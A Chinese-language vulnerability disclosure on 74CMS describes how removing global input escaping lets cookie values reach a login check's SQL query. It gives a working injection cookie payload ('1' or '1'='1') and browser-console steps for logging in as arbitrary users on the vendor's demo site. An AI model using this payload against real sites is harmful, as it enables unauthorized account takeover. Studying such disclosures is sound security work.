VULHUB ™

### 简要描述： 骑士CMS最新版任意用户登陆（官网demo测试）。 ### 详细说明： 骑士CMS最新版去掉了全局addslash ``` include/common.inc.php ``` ``` @@ -17,20 +17,10 @@ session_save_path(QISHI_ROOT_PATH.'data/sessions/'); session_start();\r require_once(QISHI_ROOT_PATH.'data/config.php');\r header("Content-Type:text/html;charset=".QISHI_CHARSET);\r +require_once(QISHI_ROOT_PATH.'include/help.class.php');\r require_once(QISHI_ROOT_PATH.'include/common.fun.php');\r require_once(QISHI_ROOT_PATH.'include/74cms_version.php');\r $QSstarttime=exectime();\r -\r -if (!empty($_GET))\r -{\r -$_GET = addslashes_deep($_GET);\r -}\r -if (!empty($_POST))\r -{\r -$_POST = addslashes_deep($_POST);\r -}\r -$_COOKIE = addslashes_deep($_COOKIE);\r -$_REQUEST = addslashes_deep($_REQUEST);\r date_default_timezone_set("PRC");\r $timestamp = time();\r $online_ip=getip();\r ``` 导致在旧版PHP GPC off或和PHP5.x上参数直接带入SQL语句，虽然include/help.class.php添加了新的过滤函数，但是对正常拼接出来的SQL语句无效。这样在GET，POST， COOKIE中均可带入'，导致各种越权。 本例以任意帐号登陆来演示。...

### 简要描述： 骑士CMS最新版任意用户登陆（官网demo测试）。 ### 详细说明： 骑士CMS最新版去掉了全局addslash ``` include/common.inc.php ``` ``` @@ -17,20 +17,10 @@ session_save_path(QISHI_ROOT_PATH.'data/sessions/'); session_start();\r require_once(QISHI_ROOT_PATH.'data/config.php');\r header("Content-Type:text/html;charset=".QISHI_CHARSET);\r +require_once(QISHI_ROOT_PATH.'include/help.class.php');\r require_once(QISHI_ROOT_PATH.'include/common.fun.php');\r require_once(QISHI_ROOT_PATH.'include/74cms_version.php');\r $QSstarttime=exectime();\r -\r -if (!empty($_GET))\r -{\r -$_GET = addslashes_deep($_GET);\r -}\r -if (!empty($_POST))\r -{\r -$_POST = addslashes_deep($_POST);\r -}\r -$_COOKIE = addslashes_deep($_COOKIE);\r -$_REQUEST = addslashes_deep($_REQUEST);\r date_default_timezone_set("PRC");\r $timestamp = time();\r $online_ip=getip();\r ``` 导致在旧版PHP GPC off或和PHP5.x上参数直接带入SQL语句，虽然include/help.class.php添加了新的过滤函数，但是对正常拼接出来的SQL语句无效。这样在GET，POST， COOKIE中均可带入'，导致各种越权。 本例以任意帐号登陆来演示。 user/user_favorites_job.php会调用check_cookie()来检查COOKIE登陆， ``` 12 define('IN_QISHI', true); 13 require_once(dirname(__FILE__).'/../include/common.inc.php'); 14 $act = isset($_REQUEST['act']) ? trim($_REQUEST['act']) : 'add'; 15 require_once (QISHI_ROOT_PATH.'include/mysql.class.php'); 16 $db = new mysql($dbhost,$dbuser,$dbpass,$dbname); 17 if((empty($_SESSION['uid']) || empty($_SESSION['username']) || empty($_SESSION['utype'])) && $_COOKIE['QS']['username'] && $_COOKIE['QS']['password'] && $_COOKIE['QS']['uid']) 18 { 19 require_once (QISHI_ROOT_PATH.'include/fun_user.php'); 20 if(check_cookie($_COOKIE['QS']['uid'],$_COOKIE['QS']['username'],$_COOKIE['QS']['password'])) 21 { 22 update_user_info($_COOKIE['QS']['uid'],false,false); 23 header("Location:".get_member_url($_SESSION['utype'])); 24 } 25 else 26 { ...snip... 32 } 33 } ``` ``` 223 function check_cookie($uid,$name,$pwd){ 224 global $db; 225 $row = $db->getone("SELECT COUNT(*) AS num FROM ".table('members')." WHERE uid='{$uid}' and username='{$name}' and password = '{$pwd}'"); 226 if($row['num'] > 0) 227 { 228 return true; 229 }else{ 230 return false; 231 } 232 } ``` check_cookie拼接SQL使用了没有过滤的COOKIE值，这样我们只要设置COOKIE为： ``` QS[uid]=1' or '1'='1 QS[username]=testadmin QS[password]=aa ``` 访问http://demo.74cms.com/user/user_favorites_job.php即可登陆uid为1的帐号。 未登陆状态访问http://demo.74cms.com/，F12打开chrome的开发工具，进入控制台输入： ``` document.cookie="QS[username]=test"; document.cookie="QS[password]=aa"; document.cookie="QS[uid]=1' or '1'='1"; ``` [<img src="https://images.seebug.org/upload/201508/03155124d7b5498a28b36c3e42382379355c853c.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201508/03155124d7b5498a28b36c3e42382379355c853c.png) 访问http://demo.74cms.com/user/user_favorites_job.php即可看到登陆成功。 [<img src="https://images.seebug.org/upload/201508/0315513756f4eb0d73ab0ddd90e63d6ac711b23f.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201508/0315513756f4eb0d73ab0ddd90e63d6ac711b23f.png) 退出，然后使用uid=2登陆： ``` document.cookie="QS[username]=test"; document.cookie="QS[password]=aa"; document.cookie="QS[uid]=2' or '1'='1"; ``` [<img src="https://images.seebug.org/upload/201508/0315514909bbb94fa70943add38bbefb2c3e6e61.png" alt="3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201508/0315514909bbb94fa70943add38bbefb2c3e6e61.png) 访问http://demo.74cms.com/user/user_favorites_job.php即可看到登陆成功。 [<img src="https://images.seebug.org/upload/201508/03155156328e3eda7d96b8a2a5cd60019050fcdc.png" alt="4.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201508/03155156328e3eda7d96b8a2a5cd60019050fcdc.png) ### 漏洞证明： [<img src="https://images.seebug.org/upload/201508/0315513756f4eb0d73ab0ddd90e63d6ac711b23f.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201508/0315513756f4eb0d73ab0ddd90e63d6ac711b23f.png) [<img src="https://images.seebug.org/upload/201508/03155156328e3eda7d96b8a2a5cd60019050fcdc.png" alt="4.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201508/03155156328e3eda7d96b8a2a5cd60019050fcdc.png)